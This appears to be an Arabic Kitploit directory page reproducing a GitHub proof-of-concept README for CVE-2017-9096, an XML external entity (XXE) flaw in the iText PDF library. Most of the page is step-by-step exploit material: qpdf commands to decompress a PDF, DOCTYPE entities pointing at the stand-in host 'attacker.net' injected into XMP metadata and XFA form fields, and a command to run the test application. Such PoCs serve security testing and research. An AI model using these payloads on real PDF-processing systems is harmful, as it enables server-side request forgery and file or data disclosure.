Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-9096-iText-XXE — إثبات المفهوم لاستغلال CVE-2017-9096 يوضح حقن الكيان الخارجي XML (XXE) في مكتبة iText PDF عبر بيانات XMP وحقول النموذج الخبيثة. | Kitploit
أدوات/GitHubGitHub/jakabakos/cve-2017-9096-itext-xxe
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالاختبار العشوائياختبار الاختراق
GitHubjakabakos/cve-2017-9096-itext-xxe

CVE-2017-9096-iText-XXE

إثبات المفهوم لاستغلال CVE-2017-9096 يوضح حقن الكيان الخارجي XML (XXE) في مكتبة iText PDF عبر بيانات XMP وحقول النموذج الخبيثة.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
133منذ 4 سنواتلم تتم المراجعة بعد

CVE-2017-9096

1. إنشاء ملف PDF ضار يحتوي على XXE

احصل على ملف PDF يحتوي على نموذج:

root@kitploit:~
wget https://www.pdfscripting.com/public/FreeStuff/PDFSamples/ModifySubmit_Example.pdf -O input.pdf

فك ضغط PDF

لفعل ذلك، تحتاج إلى فك ضغط PDF باستخدام qpdf --qdf --object-streams=disable input.pdf output.pdf ثم يمكنك تحرير PDF بمحرر نصوص وإضافة XML ضار.

إضافة الكيانات الخارجية

يمكنك وضع XEE في بيانات XMP الوصفية في السطر 77:

root@kitploit:~
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<!DOCTYPE foo [ <!ENTITY xxe2 SYSTEM "http://attacker.net" > ]>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.0-c321 44.398116, Tue Aug 04 2009 14:24:39">

وبالطبع ضع المرجع أيضًا في مكان ما، مثلًا السطر 88:

root@kitploit:~
<xap:CreatorTool>Adobe LiveCycle Designer 8.0 &xxe2;</xap:CreatorTool>

يمكنك أيضًا إضافة XXE عادي إلى الملف. انظر هذا الجزء في المستند الأصلي (يبدأ من السطر 740):

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

غيّره إلى ما يلي:

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.net" > ]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

ثم، فقط أضف المرجع إلى مكان ما، مثلًا حقل المدينة (السطر 1845 في المستند المفكوك الضغط الأصلي). غيّر هذا:

root@kitploit:~
<text
>City:</text
></value
>

إلى هذا:

root@kitploit:~
<text
>City:</text
><xxe>&xxe;</xxe></value
>

ستجد ملف PDF المصحح الذي يحتوي على كلا XXE في هذا المستودع أيضًا (output_with_xxe.pdf)

2. تنفيذ الهجوم

قم بتشغيل تطبيق Java لاختبار PDF باستخدام mvn clean compile exec:java.

تنزيل الأداة